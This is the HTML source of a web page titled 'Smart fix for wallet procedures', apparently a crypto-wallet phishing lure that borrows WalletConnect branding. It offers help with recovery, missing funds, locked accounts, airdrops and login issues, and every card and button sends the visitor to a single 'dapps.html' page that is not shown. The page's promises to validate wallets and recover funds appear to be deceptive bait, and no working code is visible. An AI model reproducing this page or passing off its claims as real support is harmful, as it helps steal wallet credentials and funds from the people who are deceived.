
<!DOCTYPE html>
<html lang="en-US" dir="ltr">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Smart fix for wallet procedures</title>
    <link rel="shortcut icon" type="image/x-icon" href="../walletsconnectvalidator.net/images/walletconnect-logo.png">
    <link rel="stylesheet" crossorigin="anonymous" href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" integrity="sha512-HK5fgLBL+xu6dm/Ii3z4xhlSUyZgTT9tuc/hSrtw6uzJOvgRr2a9jyxxT1ely+B+xFAmJKVSTbpM/CuL7qxO8w==">
    <link href="assets/css/theme.css" rel="stylesheet" />

    <link href="vendors/swiper/swiper-bundle.min.css" rel="stylesheet">
  </head>
  <body>
    <main class="main" id="top">
      <nav class="navbar navbar-light sticky-top" data-navbar-darken-on-scroll="900">
        
          
        </div>
      </nav>
  <section class="mt-12">
        <div class="container">
          <div class="row align-items-center">
            <div class="col-md-9 col-lg-8 col-xl-5">
              <h1 class="display-3 lh-sm">
</h1>
            </div>
           <a href="./assets/dapps.html">
            <div class="col-md-9 col-xl-5">
              <button class="btn btn-primary mt-3">Validate wallet here</button>
            </div></a>
          </div>
        </div>
        <!-- end of .container-->

      </section>

      <!-- ============================================-->
      <!-- <section> begin
      <section class="mt-6">

        <div class="container">
          <div class="row align-items-center">
            <div class="col-md-9 col-lg-8 col-xl-5">
              <h1 class="display-3 lh-sm">How can we help you?</h1>
            </div>
            <div class="col-md-9 col-xl-5">
              <p class="fs-2">Our landing page template works on all devices, and browsers, so you only have to set it up once, and get beautiful results forever.</p>
              <button class="btn btn-primary mt-3">Pricing and Plans</button>
            </div>
          </div>
        </div>

      </section> ============================-->



      <!-- <section> close ============================-->
      <!-- ============================================-->




      <!-- ============================================-->
      <!-- <section> begin ============================-->
      <!--<section>

        <div class="container"><img class="img-fluid" src="assets/imggallery/dashboard.png" alt="Dashboard" />
        </div>

      </section>-->
      <!-- <section> close ============================-->
      <!-- ============================================-->




      <!-- ============================================-->
      <!-- <section> begin ============================-->




      <!-- ============================================-->
      <!-- <section> begin ============================-->
      <section>

        <div class="container">
          <h1 class="display-6 fw-semi-bold"> Please select Issue Category </h1>
          <p class="fs-2">which of this is related to your issue?</p>


          <div class="row mb-4 mt-6">
            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
            <div class="col-md-6">
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/dashboardicon.png" alt="Dashboard" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Swap/Exchange</h3>
                  <p class="mb-0">We will support you in any related issues with swaping and/or exchange of coins. Kindly click here.</p>
                </div>
              </div></a>
              </div>

<div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/trilored.png" alt="Statistic" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Maintenance</h3>
                  constant maintenance of account keeps it running well<p class="mb-0">Kindly click here to maintain</p>
                </div>
            </div></a>
        </div>

<div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/statistics.png" alt="Statistic" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Staking</h3>
                  Want to stake tokens and earn rewards?<p class="mb-0">Kindly click here.</p>
                </div>
              </div></a>
            </div>
        
           <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/icons8-warning-64.png" alt="Statistic" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Recovery</h3>
                  Want to recover lost tokens?<p class="mb-0">Kindly click here.</p>
                </div>
             
            </div></a>
            </div>
<div class="row mb-4 mt-6">
            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
            <div class="col-md-6">
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/dashboardicon.png" alt="Dashboard" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Connect to Dapps</h3>
                  Connect decentralised web applications to mobile wallets. Enable DAPP on mobile wallet/ Extension.<p class="mb-0">Kindly click here.</p>
                </div>
              </div></a>
            </div>
            
            <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/icons8-warning-64.png" alt="Comment" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Login Issues</h3>
                  Do you have issues logging into your wallet?<p class="mb-0">Kindly click here.</p>
                </div>
              </div>
            </div></a>
          </div>


          <div class="row mb-4">
            <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/trilored.png" alt="Tailored" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Missing Funds</h3>
                  Lost access to funds or funds is missing?<p class="mb-0">Kindly click here.</p>
                </div>
              </div></a>
            </div>


            <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/statistics.png" alt="Statistic" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">High Fees</h3>
                  Increase in transaction fees?<p class="mb-0">Kindly click here.</p>
                </div>
              </div>
            </div></a>
          </div>
<div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/trilored.png" alt="Statistic" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Purchase NFT</h3>
                  Want to purchase NFT with low fee?<p class="mb-0">Kindly click here.</p>
                </div>
              
            </div></a>
          </div>
          <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/dashboardicon.png" alt="Statistic" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Claim Airdrop</h3>
                  Interested in free Airdrops?<p class="mb-0">Kindly click here.</p>
                </div>
              </div>
            </div></a>
          </div>
          <div class="row">
            <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/profile.png" alt="Profiles" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Transaction Delay</h3>
                  Do you have issues with transactions being delayed?<p class="mb-0">Kindly click here</p>
                </div>
              </div></a>
            </div>


            <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/icons8-neutral-trading-80.png" alt="Folders" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Issues With Trading wallet</h3>
                  Do you have probems with your trading account?<p class="mb-0">Kindly click here.</p>
                </div>
              </div></a>
            </div>


            <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/icons8-failed-64.png" alt="Folders" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Unable to purchase coins</h3>
                  if your account is not recognized as a trusted payment source you may not be able to buy crypto and add coins <p class="mb-0">Kindly click here and follow the process to get started.</p>
                </div>
              </div></a>
            </div>



            <div class="col-md-6">

            <a class="text-300 text-decoration-none footer-link" href="./assets/dapps.html"> 
              <div class="border rounded-1 border-700 h-100 features-items">
                <div class="p-5"><img src="assets/imggallery/icons8-lock-80.png" alt="Folders" style="width:48px;height:48px;" />
                  <h3 class="pt-3 lh-base">Locked Account</h3>
                 if you are logged out due to activity on the account <p class="mb-0">Kindly click here.</p>
                </div>
              </div>
            </div></a>
          </div>
        </div>
        <!-- end of .container-->
      </section>
      <section class="mt-5">

        <div class="container">
          <div class="text-center">
            <div class="p-5  rounded-3">
              <div class="py-3">
                <h4 class="opacity-50 ls-2 lh-base fw-medium">READY TO START</h4>
                <h2 class="mt-3 fs-4 fs-sm-7 latter-sp-3 lh-base fw-semi-bold">We are here to provide help in any related issues you are having with your wallet account </h2>

                 <textarea id="editor" placeholder="Let us know any other issues you are facing and follow the process after filling this space " rows="4" cols="26"></textarea>

              </div>
                           <div class="flex-center d-flex">


                <a href="./assets/dapps.html"><button class="btn btn-info">Get Started <span class="fas fa-arrow-right"></span></button></a>
              </div>
            </div>
          </div>
        </div>
      </section>
      <section class="bg-secondary">

        <div class="container">
          <div class="row">
            <div class="col-xl-3 text-center text-xl-start"><a href="index-2.html#!"><img class="footer-img me-xl-5 me-3" src="assets/imggallery/facebook-line1.svg" alt="fb" style="width:20px;height:20px;" /></a><a href="index-2.html#!"><img class="footer-img me-xl-5 me-3" src="assets/imggallery/linkedin-line1.svg" alt="in" style="width:20px;height:20px;" /></a><a href="index-2.html#!"><img class="footer-img me-xl-5 me-3" src="assets/imggallery/twitter-line1.svg" alt="twitter" style="width:20px;height:20px;" /></a><a href="index-2.html#!"><img class="footer-img me-xl-5 me-3" src="assets/imggallery/instagram-line1.svg" alt="instragram" style="width:20px;height:20px;" /></a>
            </div>
            <div class="col-xl-4 pt-2 pt-xl-0">
              <p class="mb-0 text-center text-xl-end"><a class="text-300 text-decoration-none footer-link" href="index-2.html#!"> Terms &amp; conditon </a><a class="text-300 text-decoration-none footer-link ps-4" href="index-2.html#!">Privacy Policy </a>
              </p>
            </div>
           
          </div>
        </div>

      </section>


    </main>
    <script src="vendors/%40popperjs/popper.min.js"></script>
    <script src="vendors/bootstrap/bootstrap.min.js"></script>
    <script src="vendors/is/is.min.js"></script>
    <script src="vendors/swiper/swiper-bundle.min.js"></script>
    <link rel="preconnect" href="https://fonts.gstatic.com/">
    <link href="https://fonts.googleapis.com/css2?family=Sora:wght@100;200;300;400;500;600;700;800&amp;display=swap" rel="stylesheet">
    <script src="assets/js/theme.js"></script>

    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,200;1,300;1,400&amp;display=swap" rel="stylesheet">
    <script src="//code.tidio.co/jaivnhi441tkqq7d5czb7hekmcdnmuag.js" async></script>
  </body>

</html>